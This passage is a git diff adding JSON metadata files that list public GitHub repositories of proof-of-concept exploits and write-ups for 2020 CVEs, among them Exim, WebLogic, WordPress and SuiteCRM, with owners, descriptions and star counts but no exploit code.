"public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 377948316, + "name": "CVE-2020-27955", + "full_name": "FrostsaberX\/CVE-2020-27955", + "owner": { + "login": "FrostsaberX", + "id": 24857203, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24857203?v=4", + "html_url": "https:\/\/github.com\/FrostsaberX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FrostsaberX\/CVE-2020-27955", + "description": "Git-LFS RCE Test", + "fork": false, + "created_at": "2021-06-17T20:04:33Z", + "updated_at": "2024-08-12T20:14:01Z", + "pushed_at": "2021-06-17T20:58:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 391941607, + "name": "CVE-2020-27955-LFS-main", + "full_name": "whitetea2424\/CVE-2020-27955-LFS-main", + "owner": { + "login": "whitetea2424", + "id": 80032455, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80032455?v=4", + "html_url": "https:\/\/github.com\/whitetea2424", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/whitetea2424\/CVE-2020-27955-LFS-main", + "description": null, + "fork": false, + "created_at": "2021-08-02T12:32:08Z", + "updated_at": "2021-08-02T13:13:28Z", + "pushed_at": "2021-08-02T13:13:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 481308105, + "name": "cve-2020-27955", + "full_name": "userxfan\/cve-2020-27955", + "owner": { + "login": "userxfan", + "id": 103595009, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103595009?v=4", + "html_url": "https:\/\/github.com\/userxfan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/userxfan\/cve-2020-27955", + "description": "cve-2020-27955", + "fork": false, + "created_at": "2022-04-13T17:16:48Z", + "updated_at": "2022-06-09T12:06:24Z", + "pushed_at": "2022-06-09T12:07:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 578921503, + "name": "CVE-2020-27955", + "full_name": "z50913\/CVE-2020-27955", + "owner": { + "login": "z50913", + "id": 78022659, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78022659?v=4", + "html_url": "https:\/\/github.com\/z50913", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/z50913\/CVE-2020-27955", + "description": null, + "fork": false, + "created_at": "2022-12-16T07:54:45Z", + "updated_at": "2022-12-16T08:01:40Z", + "pushed_at": "2022-12-16T08:36:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 596482815, + "name": "CVE-2020-27955-LFS", + "full_name": "Kimorea\/CVE-2020-27955-LFS", + "owner": { + "login": "Kimorea", + "id": 34378409, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34378409?v=4", + "html_url": "https:\/\/github.com\/Kimorea", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Kimorea\/CVE-2020-27955-LFS", + "description": null, + "fork": false, + "created_at": "2023-02-02T09:28:33Z", + "updated_at": "2023-02-02T09:34:22Z", + "pushed_at": "2023-02-02T09:34:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-27976.json b/2020/CVE-2020-27976.json new file mode 100644 index 0000000000..6cf12a4eca --- /dev/null +++ b/2020/CVE-2020-27976.json @@ -0,0 +1,37 @@ +[ + { + "id": 308646506, + "name": "CVE-2020-27976", + "full_name": "k0rnh0li0\/CVE-2020-27976", + "owner": { + "login": "k0rnh0li0", + "id": 73505124, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73505124?v=4", + "html_url": "https:\/\/github.com\/k0rnh0li0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k0rnh0li0\/CVE-2020-27976", + "description": "osCommerce Phoenix CE <=1.0.5.4 Authenticated RCE", + "fork": false, + "created_at": "2020-10-30T13:59:23Z", + "updated_at": "2023-11-17T00:56:42Z", + "pushed_at": "2020-10-30T14:18:06Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exploit", + "rce" + ], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-28018.json b/2020/CVE-2020-28018.json new file mode 100644 index 0000000000..a190073b60 --- /dev/null +++ b/2020/CVE-2020-28018.json @@ -0,0 +1,64 @@ +[ + { + "id": 367662074, + "name": "CVE-2020-28018", + "full_name": "dorkerdevil\/CVE-2020-28018", + "owner": { + "login": "dorkerdevil", + "id": 15796745, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15796745?v=4", + "html_url": "https:\/\/github.com\/dorkerdevil", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dorkerdevil\/CVE-2020-28018", + "description": "exim use after free exploit and detection", + "fork": false, + "created_at": "2021-05-15T15:09:05Z", + "updated_at": "2024-08-12T20:13:01Z", + "pushed_at": "2021-05-15T15:10:23Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 368612795, + "name": "CVE-2020-28018", + "full_name": "zr0tt\/CVE-2020-28018", + "owner": { + "login": "zr0tt", + "id": 43872162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43872162?v=4", + "html_url": "https:\/\/github.com\/zr0tt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zr0tt\/CVE-2020-28018", + "description": "Exploit for Exim4 4.93 CVE-2020-28018", + "fork": false, + "created_at": "2021-05-18T17:22:45Z", + "updated_at": "2023-09-29T08:38:34Z", + "pushed_at": "2021-05-18T17:25:06Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-28032.json b/2020/CVE-2020-28032.json new file mode 100644 index 0000000000..c73faf728d --- /dev/null +++ b/2020/CVE-2020-28032.json @@ -0,0 +1,37 @@ +[ + { + "id": 428943414, + "name": "CVE-2020-28032_PoC", + "full_name": "nth347\/CVE-2020-28032_PoC", + "owner": { + "login": "nth347", + "id": 20441996, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20441996?v=4", + "html_url": "https:\/\/github.com\/nth347", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nth347\/CVE-2020-28032_PoC", + "description": "PoC for CVE-2020-28032 (It's just a POP chain in WordPress < 5.5.2 for exploiting PHP Object Injection)", + "fork": false, + "created_at": "2021-11-17T07:09:47Z", + "updated_at": "2024-07-01T08:22:38Z", + "pushed_at": "2021-11-17T07:43:54Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "deserialization-vulnerability", + "security-vulnerability", + "wordpress" + ], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-28052.json b/2020/CVE-2020-28052.json new file mode 100644 index 0000000000..dafe717050 --- /dev/null +++ b/2020/CVE-2020-28052.json @@ -0,0 +1,64 @@ +[ + { + "id": 322948567, + "name": "bouncy-castle-generative-test-poc", + "full_name": "madstap\/bouncy-castle-generative-test-poc", + "owner": { + "login": "madstap", + "id": 7657597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7657597?v=4", + "html_url": "https:\/\/github.com\/madstap", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/madstap\/bouncy-castle-generative-test-poc", + "description": "A generative test that would've caught CVE-2020-28052", + "fork": false, + "created_at": "2020-12-19T22:22:45Z", + "updated_at": "2020-12-19T22:30:59Z", + "pushed_at": "2020-12-19T22:30:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 326754867, + "name": "CVE-2020-28052_PoC", + "full_name": "kurenaif\/CVE-2020-28052_PoC", + "owner": { + "login": "kurenaif", + "id": 3713845, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3713845?v=4", + "html_url": "https:\/\/github.com\/kurenaif", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kurenaif\/CVE-2020-28052_PoC", + "description": null, + "fork": false, + "created_at": "2021-01-04T17:13:39Z", + "updated_at": "2021-01-06T16:12:43Z", + "pushed_at": "2021-01-06T15:40:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-28054.json b/2020/CVE-2020-28054.json new file mode 100644 index 0000000000..5383c4968d --- /dev/null +++ b/2020/CVE-2020-28054.json @@ -0,0 +1,41 @@ +[ + { + "id": 313250504, + "name": "Tivoli-Madness", + "full_name": "VoidSec\/Tivoli-Madness", + "owner": { + "login": "VoidSec", + "id": 5717603, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5717603?v=4", + "html_url": "https:\/\/github.com\/VoidSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VoidSec\/Tivoli-Madness", + "description": "Advisory for CVE-2020-28054 & stack based buffer overflow in IBM Tivoli Storage Manager", + "fork": false, + "created_at": "2020-11-16T09:27:33Z", + "updated_at": "2024-03-19T20:22:31Z", + "pushed_at": "2020-11-18T12:55:55Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "authorization-bypass", + "buffer-overflow", + "exploit", + "ibm", + "jamodat", + "tivoli", + "voidsec" + ], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-28148.json b/2020/CVE-2020-28148.json new file mode 100644 index 0000000000..e42b1f6d66 --- /dev/null +++ b/2020/CVE-2020-28148.json @@ -0,0 +1,33 @@ +[ + { + "id": 432963715, + "name": "CVE-2020-28148", + "full_name": "fengchenzxc\/CVE-2020-28148", + "owner": { + "login": "fengchenzxc", + "id": 41096522, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41096522?v=4", + "html_url": "https:\/\/github.com\/fengchenzxc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fengchenzxc\/CVE-2020-28148", + "description": "攻击WIFI的常用方式", + "fork": false, + "created_at": "2021-11-29T08:38:27Z", + "updated_at": "2024-09-14T01:16:02Z", + "pushed_at": "2021-11-29T08:57:39Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-28169.json b/2020/CVE-2020-28169.json new file mode 100644 index 0000000000..5a797faff4 --- /dev/null +++ b/2020/CVE-2020-28169.json @@ -0,0 +1,33 @@ +[ + { + "id": 324129597, + "name": "FluentD-TD-agent-Exploit-CVE-2020-28169", + "full_name": "zubrahzz\/FluentD-TD-agent-Exploit-CVE-2020-28169", + "owner": { + "login": "zubrahzz", + "id": 75847415, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75847415?v=4", + "html_url": "https:\/\/github.com\/zubrahzz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zubrahzz\/FluentD-TD-agent-Exploit-CVE-2020-28169", + "description": "Insecure Folder permission that lead to privilege escalation", + "fork": false, + "created_at": "2020-12-24T10:27:30Z", + "updated_at": "2020-12-24T16:04:05Z", + "pushed_at": "2020-12-24T16:02:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-28243.json b/2020/CVE-2020-28243.json new file mode 100644 index 0000000000..41172bcd7c --- /dev/null +++ b/2020/CVE-2020-28243.json @@ -0,0 +1,39 @@ +[ + { + "id": 323716576, + "name": "CVE-2020-28243", + "full_name": "stealthcopter\/CVE-2020-28243", + "owner": { + "login": "stealthcopter", + "id": 1211162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1211162?v=4", + "html_url": "https:\/\/github.com\/stealthcopter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/stealthcopter\/CVE-2020-28243", + "description": "CVE-2020-28243 Local Privledge Escalation Exploit in SaltStack Minion", + "fork": false, + "created_at": "2020-12-22T19:35:15Z", + "updated_at": "2024-08-12T20:08:45Z", + "pushed_at": "2021-03-03T08:01:22Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2020-28243", + "privilege-escalation", + "saltstack", + "saltstack-minion" + ], + "visibility": "public", + "forks": 4, + "watchers": 17, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-28328.json b/2020/CVE-2020-28328.json new file mode 100644 index 0000000000..9a792acc4d --- /dev/null +++ b/2020/CVE-2020-28328.json @@ -0,0 +1,33 @@ +[ + { + "id": 310454719, + "name": "SuiteCRM-RCE", + "full_name": "mcorybillington\/SuiteCRM-RCE", + "owner": { + "login": "mcorybillington", + "id": 24510213, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24510213?v=4", + "html_url": "https:\/\/github.com\/mcorybillington", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mcorybillington\/SuiteCRM-RCE", + "description": "Writeup on CVE-2020-28328: SuiteCRM Log File Remote Code Execution plus some bonus Cross-Site Scripting", + "fork": false, + "created_at": "2020-11-06T00:56:36Z", + "updated_at": "2022-11-09T18:10:01Z", + "pushed_at": "2020-11-23T17:27:07Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-28351.json b/2020/CVE-2020-28351.json new file mode 100644 index 0000000000..1865693393 --- /dev/null +++ b/2020/CVE-2020-28351.json @@ -0,0 +1,33 @@ +[ + { + "id": 310680217, + "name": "CVE-2020-28351", + "full_name": "dievus\/CVE-2020-28351", + "owner": { + "login": "dievus", + "id": 25853389, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25853389?v=4", + "html_url": "https:\/\/github.com\/dievus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dievus\/CVE-2020-28351", + "description": "CVE-2020-28351 - Reflected Cross-Site Scripting attack in ShoreTel version 19.46.1802.0.", + "fork": false, + "created_at": "2020-11-06T18:49:47Z", + "updated_at": "2024-08-12T20:07:26Z", + "pushed_at": "2020-11-09T13:36:03Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-28414.json b/2020/CVE-2020-28414.json new file mode 100644 index 0000000000..b51a96f109 --- /dev/null +++ b/2020/CVE-2020-28414.json @@ -0,0 +1,33 @@ +[ + { + "id": 312285919, + "name": "CVE-2020-28414", + "full_name": "jet-pentest\/CVE-2020-28414", + "owner": { + "login": "jet-pentest", + "id": 71512502, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71512502?v=4", + "html_url": "https:\/\/github.com\/jet-pentest", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jet-pentest\/CVE-2020-28414", + "description": null, + "fork": false, + "created_at": "2020-11-12T13:31:50Z", + "updated_at": "2021-02-14T09:24:18Z", + "pushed_at": "2020-11-12T13:32:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-28415.json b/2020/CVE-2020-28415.json new file mode 100644 index 0000000000..57d1a95aea --- /dev/null +++ b/2020/CVE-2020-28415.json @@ -0,0 +1,33 @@ +[ + { + "id": 312286062, + "name": "CVE-2020-28415", + "full_name": "jet-pentest\/CVE-2020-28415", + "owner": { + "login": "jet-pentest", + "id": 71512502, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71512502?v=4", + "html_url": "https:\/\/github.com\/jet-pentest", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jet-pentest\/CVE-2020-28415", + "description": null, + "fork": false, + "created_at": "2020-11-12T13:32:23Z", + "updated_at": "2021-02-14T09:24:17Z", + "pushed_at": "2020-11-12T13:32:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-28458.json b/2020/CVE-2020-28458.json new file mode 100644 index 0000000000..23a599b464 --- /dev/null +++ b/2020/CVE-2020-28458.json @@ -0,0 +1,33 @@ +[ + { + "id": 875215448, + "name": "CVE-2020-28458", + "full_name": "fazilbaig1\/CVE-2020-28458", + "owner": { + "login": "fazilbaig1", + "id": 25384256, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25384256?v=4", + "html_url": "https:\/\/github.com\/fazilbaig1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fazilbaig1\/CVE-2020-28458", + "description": "Affected versions of this package are vulnerable to Prototype Pollution.", + "fork": false, + "created_at": "2024-10-19T11:53:20Z", + "updated_at": "2024-10-19T11:56:50Z", + "pushed_at": "2024-10-19T11:56:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-28478.json b/2020/CVE-2020-28478.json new file mode 100644 index 0000000000..cc2f218aba --- /dev/null +++ b/2020/CVE-2020-28478.json @@ -0,0 +1,33 @@ +[ + { + "id": 589819198, + "name": "CVE-2020-28478--PoC", + "full_name": "NetJBS\/CVE-2020-28478--PoC", + "owner": { + "login": "NetJBS", + "id": 100053595, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100053595?v=4", + "html_url": "https:\/\/github.com\/NetJBS", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NetJBS\/CVE-2020-28478--PoC", + "description": null, + "fork": false, + "created_at": "2023-01-17T02:19:31Z", + "updated_at": "2024-06-05T12:52:43Z", + "pushed_at": "2023-01-17T02:22:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-28488.json b/2020/CVE-2020-28488.json new file mode 100644 index 0000000000..5dee4df179 --- /dev/null +++ b/2020/CVE-2020-28488.json @@ -0,0 +1,33 @@ +[ + { + "id": 332742743, + "name": "CVE-2020-28488", + "full_name": "rafaelcintralopes\/CVE-2020-28488", + "owner": { + "login": "rafaelcintralopes", + "id": 1049012, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1049012?v=4", + "html_url": "https:\/\/github.com\/rafaelcintralopes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rafaelcintralopes\/CVE-2020-28488", + "description": "Denial of Service (DoS) - jQuery UI 1.12.1 - Exploit", + "fork": false, + "created_at": "2021-01-25T12:39:14Z", + "updated_at": "2021-01-25T13:24:56Z", + "pushed_at": "2021-01-25T13:24:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-28502.json b/2020/CVE-2020-28502.json new file mode 100644 index 0000000000..f866016627 --- /dev/null +++ b/2020/CVE-2020-28502.json @@ -0,0 +1,69 @@ +[ + { + "id": 366703109, + "name": "CVE-2020-28502", + "full_name": "s-index\/CVE-2020-28502", + "owner": { + "login": "s-index", + "id": 56715563, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56715563?v=4", + "html_url": "https:\/\/github.com\/s-index", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s-index\/CVE-2020-28502", + "description": "CVE-2020-28502 node-XMLHttpRequest RCE", + "fork": false, + "created_at": "2021-05-12T12:11:03Z", + "updated_at": "2024-08-12T20:12:56Z", + "pushed_at": "2021-05-12T12:18:50Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-28502", + "poc", + "rce", + "xmlhttprequest" + ], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 390319299, + "name": "CVE-2020-28502", + "full_name": "dpredrag\/CVE-2020-28502", + "owner": { + "login": "dpredrag", + "id": 3372646, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3372646?v=4", + "html_url": "https:\/\/github.com\/dpredrag", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dpredrag\/CVE-2020-28502", + "description": null, + "fork": false, + "created_at": "2021-07-28T11:01:56Z", + "updated_at": "2021-07-28T11:03:19Z", + "pushed_at": "2021-07-28T11:03:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-28647.json b/2020/CVE-2020-28647.json new file mode 100644 index 0000000000..4deeb6d781 --- /dev/null +++ b/2020/CVE-2020-28647.json @@ -0,0 +1,33 @@ +[ + { + "id": 322287030, + "name": "Progress-MOVEit-Transfer-2020.1-Stored-XSS-CVE-2020-28647", + "full_name": "SECFORCE\/Progress-MOVEit-Transfer-2020.1-Stored-XSS-CVE-2020-28647", + "owner": { + "login": "SECFORCE", + "id": 8157384, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8157384?v=4", + "html_url": "https:\/\/github.com\/SECFORCE", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SECFORCE\/Progress-MOVEit-Transfer-2020.1-Stored-XSS-CVE-2020-28647", + "description": "MOVEit Transfer 2020 web application Stored Cross-Site Scripting (XSS)", + "fork": false, + "created_at": "2020-12-17T12:23:18Z", + "updated_at": "2020-12-17T12:33:47Z", + "pushed_at": "2020-12-17T12:31:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-28653.json b/2020/CVE-2020-28653.json new file mode 100644 index 0000000000..c81d840183 --- /dev/null +++ b/2020/CVE-2020-28653.json @@ -0,0 +1,95 @@ +[ + { + "id": 391357341, + "name": "CVE-2020-28653", + "full_name": "tuo4n8\/CVE-2020-28653", + "owner": { + "login": "tuo4n8", + "id": 21272757, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21272757?v=4", + "html_url": "https:\/\/github.com\/tuo4n8", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tuo4n8\/CVE-2020-28653", + "description": null, + "fork": false, + "created_at": "2021-07-31T13:00:15Z", + "updated_at": "2023-07-13T09:42:39Z", + "pushed_at": "2022-03-09T02:57:14Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 406067197, + "name": "cve-2020-28653-poc", + "full_name": "intrigueio\/cve-2020-28653-poc", + "owner": { + "login": "intrigueio", + "id": 7463185, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7463185?v=4", + "html_url": "https:\/\/github.com\/intrigueio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/intrigueio\/cve-2020-28653-poc", + "description": null, + "fork": false, + "created_at": "2021-09-13T17:27:02Z", + "updated_at": "2022-02-05T08:04:25Z", + "pushed_at": "2021-11-16T17:30:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 479014774, + "name": "ManageEngine-CVE-2020-28653", + "full_name": "mr-r3bot\/ManageEngine-CVE-2020-28653", + "owner": { + "login": "mr-r3bot", + "id": 37280106, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37280106?v=4", + "html_url": "https:\/\/github.com\/mr-r3bot", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mr-r3bot\/ManageEngine-CVE-2020-28653", + "description": null, + "fork": false, + "created_at": "2022-04-07T14:13:29Z", + "updated_at": "2022-04-15T04:15:35Z", + "pushed_at": "2022-04-15T04:15:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-2883.json b/2020/CVE-2020-2883.json new file mode 100644 index 0000000000..9c62c3cd13 --- /dev/null +++ b/2020/CVE-2020-2883.json @@ -0,0 +1,227 @@ +[ + { + "id": 262748816, + "name": "CVE-2020-2883", + "full_name": "Y4er\/CVE-2020-2883", + "owner": { + "login": "Y4er", + "id": 40487319, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40487319?v=4", + "html_url": "https:\/\/github.com\/Y4er", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Y4er\/CVE-2020-2883", + "description": "Weblogic coherence.jar RCE", + "fork": false, + "created_at": "2020-05-10T09:04:43Z", + "updated_at": "2024-08-12T20:01:19Z", + "pushed_at": "2020-05-10T09:29:36Z", + "stargazers_count": 178, + "watchers_count": 178, + "has_discussions": false, + "forks_count": 38, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-2883", + "java", + "rce", + "weblogic" + ], + "visibility": "public", + "forks": 38, + "watchers": 178, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 263590986, + "name": "Weblogic_CVE-2020-2883_POC", + "full_name": "MagicZer0\/Weblogic_CVE-2020-2883_POC", + "owner": { + "login": "MagicZer0", + "id": 19569793, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19569793?v=4", + "html_url": "https:\/\/github.com\/MagicZer0", + 